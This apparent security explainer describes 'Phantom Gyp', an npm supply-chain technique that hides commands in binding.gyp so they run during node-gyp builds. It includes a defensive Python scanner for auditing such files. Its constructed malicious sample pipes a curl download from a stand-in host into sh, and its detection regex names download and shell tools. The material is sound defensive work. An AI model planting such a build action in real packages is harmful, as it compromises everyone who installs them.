
Phantom Gyp
Phantom Gyp is a supply-chain attack variant observed on 3 June 2026 that weaponises the binding.gyp native-build configuration file so that malicious code runs during npm install inside the node-gyp build step (the step that compiles a package's C/C++ sources), rather than through the preinstall and postinstall hooks that script monitors watch.
Last refreshed: 14 June 2026
If blocking binding.gyp breaks legitimate packages, how should security teams respond to Phantom Gyp?
Timeline for Phantom Gyp
3 June 2026: malicious code executed during the node-gyp native build step triggered by binding.gyp, evading npm lifecycle-hook monitors
Topic: Cybersecurity: Threats and Defences: Attack worm kit now open-sourced freely
- What is Phantom Gyp and how does it evade npm security tools?
- Phantom Gyp is a supply-chain attack that hides malicious code in a package's binding.gyp file, so it runs when node-gyp drives the system C/C++ compiler during install rather than through the preinstall/postinstall hooks that security monitors typically watch. Source: Protos Labs
- Why can't standard npm hook monitoring detect Phantom Gyp?
- Most npm security tools flag preinstall and postinstall scripts as high-risk. Phantom Gyp bypasses these by executing through the native build step triggered by binding.gyp. When a package ships binding.gyp and declares no install or preinstall script of its own, npm runs `node-gyp rebuild` implicitly, so a tool that only reads the `scripts` block of package.json sees no hook at all. Source: Protos Labs
- How do I check if a package uses binding.gyp for malicious purposes?
- Audit the binding.gyp file of any native npm package for command execution that does not belong to a local compile: `actions` or `rules` entries whose `action` argv downloads a binary, runs a shell, or reaches out to the network, and `<!(cmd)` / `<!@(cmd)` expansions, which GYP evaluates by running `cmd` when it generates the build files. A legitimate binding.gyp normally lists local source files, include paths, and compiler flags; anything that fetches or executes content from outside the package tree is a red flag. Source: Protos Labs
Background
Phantom Gyp is a supply-chain attack technique observed on 3 June 2026, classified as a variant of the Shai-Hulud framework developed by UNC6780/TeamPCP. It weaponises the npm `binding.gyp` file, the build description that `node-gyp` turns into platform build files and then compiles with the system's C/C++ toolchain. npm invokes `node-gyp rebuild` as a package's default `install` step whenever `binding.gyp` is present and the package declares no explicit `install` or `preinstall` script. By placing malicious commands in this build step, Phantom Gyp causes them to execute as subprocesses of the native build rather than as a declared `preinstall` or `postinstall` hook, defeating the primary defensive layer most package-monitoring tools rely on: inspection of the lifecycle scripts listed in package.json.
The technique is significant because `binding.gyp`-based native modules are common in legitimate packages that require operating-system-level bindings (cryptography, database clients, image processing). Security tooling that flags `preinstall`/`postinstall` hooks as high-risk will not alert on the same code delivered through the native-build path. Affected packages in the Phantom Gyp campaign also carried valid SLSA provenance attestations; provenance proves where a package was built, not that its build description is benign, so attestation-based trust is of limited value for packages that compile natively.
Defence requires either blocking native-build execution at install time (for example `npm install --ignore-scripts`, which also skips the implicit `node-gyp rebuild` and therefore breaks every legitimate native module unless those packages are allow-listed and built separately) or auditing `binding.gyp` content explicitly. The Phantom Gyp technique is expected to persist independently of the broader Shai-Hulud framework given its simplicity and the difficulty of wholesale blocking native npm builds.
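The following scanner is an added example, not Protos Labs' or npm's tooling, illustrating both the audit described under "How do I check if a package uses binding.gyp for malicious purposes?" and the implicit `node-gyp rebuild` trigger described in the Background. It relies on one property of the format: GYP parses `binding.gyp` as a Python literal, so `ast.literal_eval` accepts the same syntax (single quotes, trailing commas, `#` comments) without executing anything. The two `binding.gyp` samples and the `package.json` fragments are constructed for this example; `example.invalid` is a reserved, non-routable name, not a real indicator. The red-flag token list is an assumption of this example and is indicative, not exhaustive.

```python
"""Audit binding.gyp for build-time command execution (added example).

Assumptions: GYP's Python-literal syntax for binding.gyp; the HIGH_RISK
tokens below are a starting point, not a complete indicator set.
"""
from __future__ import annotations

import ast
import json
import re
from typing import Any, Iterator

# Things a local C/C++ compile has no reason to do from binding.gyp.
HIGH_RISK = re.compile(
    r"https?://|/bin/(ba)?sh|"
    r"\b(curl|wget|certutil|bitsadmin|powershell|invoke-webrequest|"
    r"base64|chmod|bash|cmd\.exe)\b",
    re.IGNORECASE,
)
# GYP runs '<!(cmd)' and '<!@(cmd)' when it generates build files.
CMD_EXPANSION = re.compile(r"<!@?\(")


def load_gyp(text: str) -> dict:
    """Parse binding.gyp without evaluating it (gyp itself uses eval)."""
    data = ast.literal_eval(text)
    if not isinstance(data, dict):
        raise ValueError("binding.gyp must be a dict at top level")
    return data


def walk(obj: Any, path: str = "$") -> Iterator[tuple[str, str]]:
    """Yield (path, string) for every string leaf; an 'action' argv list
    (used by both 'actions' and 'rules') is yielded as one command line."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            if k == "action" and isinstance(v, list):
                yield f"{path}.action", " ".join(map(str, v))
            else:
                yield from walk(v, f"{path}.{k}")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from walk(v, f"{path}[{i}]")
    elif isinstance(obj, str):
        yield path, obj


def audit_gyp(text: str) -> list[dict]:
    """Return one finding per place the build would execute a command."""
    findings = []
    for path, s in walk(load_gyp(text)):
        runs_cmd = path.endswith(".action") or CMD_EXPANSION.search(s)
        if not runs_cmd:
            continue
        if HIGH_RISK.search(s):
            sev, why = "high", "build step fetches or executes external content"
        else:
            sev, why = "review", "build step runs a command; confirm it only touches local sources"
        findings.append({"path": path, "severity": sev, "why": why, "value": s})
    return findings


def native_build_trigger(package_json: str, has_binding_gyp: bool) -> str | None:
    """How npm will reach the native build: 'explicit:<hook>' when a script
    names gyp, 'implicit' when binding.gyp exists and no install/preinstall
    script is declared (npm then runs 'node-gyp rebuild' itself, invisible to
    a monitor that only reads the scripts block), else None."""
    scripts = json.loads(package_json).get("scripts", {})
    explicit = [k for k, v in scripts.items() if "gyp" in v]
    if explicit:
        return "explicit:" + ",".join(explicit)
    if has_binding_gyp and not ({"install", "preinstall"} & scripts.keys()):
        return "implicit"
    return None


# Constructed samples for this example; not real packages.
BENIGN_GYP = r"""{
  'targets': [{
    'target_name': 'addon',
    'sources': ['src/addon.cc'],
    # common legitimate pattern: ask node where the addon headers live
    'include_dirs': ["<!@(node -p \"require('node-addon-api').include\")"],
  }]
}"""

MALICIOUS_GYP = r"""{
  'targets': [{
    'target_name': 'addon',
    'sources': ['src/addon.cc'],
    'actions': [{
      'action_name': 'prepare',
      'inputs': [],
      'outputs': ['<(INTERMEDIATE_DIR)/prepared'],
      'action': ['sh', '-c', 'curl -fsSL https://example.invalid/p | sh'],
    }],
  }]
}"""

PKG_NO_SCRIPTS = '{"name": "addon", "version": "1.0.0"}'
PKG_EXPLICIT = '{"name": "addon", "version": "1.0.0", "scripts": {"install": "node-gyp rebuild"}}'

if __name__ == "__main__":
    for name, gyp in (("benign", BENIGN_GYP), ("malicious", MALICIOUS_GYP)):
        for f in audit_gyp(gyp):
            print(f"{name}: [{f['severity']}] {f['path']}: {f['why']} :: {f['value']}")
    print("trigger (no scripts):", native_build_trigger(PKG_NO_SCRIPTS, True))
```

The benign sample is deliberately not silent: the `<!@(node -p ...)` include-path trick is common in real addons, so it is reported as "review" rather than "high", and a reviewer confirms the command only resolves a local path. Run this over every `node_modules/**/binding.gyp` after a dry install with `--ignore-scripts` so nothing has been built yet, and treat any package whose trigger is "implicit" as one your script monitor has never looked at.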